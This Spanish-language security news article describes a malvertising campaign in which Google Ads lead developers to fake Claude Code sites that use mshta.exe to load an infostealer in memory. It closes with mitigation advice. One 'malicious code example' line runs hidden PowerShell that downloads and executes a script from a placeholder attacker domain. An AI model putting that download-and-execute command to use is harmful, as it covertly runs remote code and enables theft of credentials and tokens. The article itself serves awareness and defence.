|
.png)
Ciberdelincuentes han desplegado una sofisticada red de sitios fraudulentos que suplantan la herramienta Claude Code de Anthropic para infectar sistemas con malware diseñado para el robo de identidades técnicas. Mediante el uso de Google Ads comprometidos, los atacantes logran posicionar páginas maliciosas en los primeros resultados de búsqueda, engañando a programadores para que ejecuten comandos que comprometen credenciales de navegadores, tokens de sesión y claves de acceso a infraestructuras en la nube. 💻
La anatomía del ataque: El uso de "Living off the Land"
El vector de infección no depende de un instalador tradicional, sino que utiliza una técnica avanzada denominada Living off the Land (LotL). Al intentar descargar la herramienta, el sitio falso invoca un proceso legítimo del sistema operativo para pasar desapercibido ante los antivirus. 🛡️
Proceso Suplantado: El sitio invoca a
mshta.exe, un binario firmado por Microsoft que normalmente ejecuta aplicaciones HTML (HTA).Ejecución en Memoria: El código malicioso se carga directamente en la memoria RAM, lo que significa que no se guarda un archivo
.exeen el disco, dificultando su detección por análisis forenses convencionales. Según el análisis deANY.RUN , dominios comoclaude-code.official-version.comhan sido marcados positivamente por estas actividades.Evasión de EDR: Al ser un proceso de confianza, muchas herramientas de seguridad no bloquean la actividad por defecto, permitiendo la exfiltración de datos. 🕵️
Análisis Técnico del Vector de Infección
Un desarrollador desprevenido podría ver una instrucción de terminal que parece legítima, pero que en realidad oculta comandos para extraer información sensible. Los atacantes suelen ofuscar el código mediante Base64 para ocultar la URL de descarga del malware.
| Fase del Ataque | Método Utilizado | Referencia MITRE ATT&CK |
| Atracción | Google Ads (Publicidad engañosa) | |
| Ejecución | Binario mshta.exe | |
| Persistencia | Inyección en memoria | |
| Objetivo | Robo de información (Infostealer) |
Ejemplo de código malicioso detectado
En las comunidades de desarrolladores como
JavaScript
// Ejemplo de ejecución maliciosa vía MSHTA
mshta.exe "javascript:a=(new ActiveXObject('WScript.Shell')).Run('powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString(\'http://malicious-domain.com/payload.ps1\')\"',0);window.close()"
Nota técnica: El flag
-w hiddenasegura que no se abra ninguna ventana de terminal, haciendo que la infección ocurra de forma totalmente silenciosa mientras el usuario espera que su herramienta de IA se instale. 🚩
Te puede interesar: El auge de la Soberanía de IA: Naciones y corporaciones abandonan la nube global para proteger su propiedad intelectual
Verificación y Fuentes de Autoridad
Esta campaña ha sido documentada y verificada por diversas entidades de ciberseguridad:
Investigación Original: El analista Maurice Fielenbach fue el primero en alertar sobre el uso de anuncios de Google para esta campaña específica de Claude Code.
Reportes de Industría: Medios especializados como
CyberScoop han confirmado que esta técnica es una evolución de los ataques vistos anteriormente contra usuarios de macOS documentados porMoonlock Lab .Indicadores de Compromiso (IoCs): Se recomienda a los administradores de sistemas revisar las listas de bloqueo para dominios que imiten la estructura de Anthropic.
Medidas de mitigación para profesionales de TI
Para blindar tu entorno de trabajo frente a estas amenazas, es imperativo adoptar una postura de "Confianza Cero":
Verificación de Dominios: Accede siempre directamente a la documentación oficial en
code.claude.com .Bloqueo de mshta.exe: A menos que sea estrictamente necesario, restringe la ejecución de este binario mediante políticas de grupo (GPO).
Higiene de Sesiones: Utiliza métodos de autenticación por hardware que no sean vulnerables al robo de tokens de sesión ("Session Hijacking"). 🔑
La seguridad de tus proyectos depende de la fuente de tus herramientas. En un entorno donde la IA es el estándar, la verificación manual de las fuentes oficiales sigue siendo tu mejor defensa.
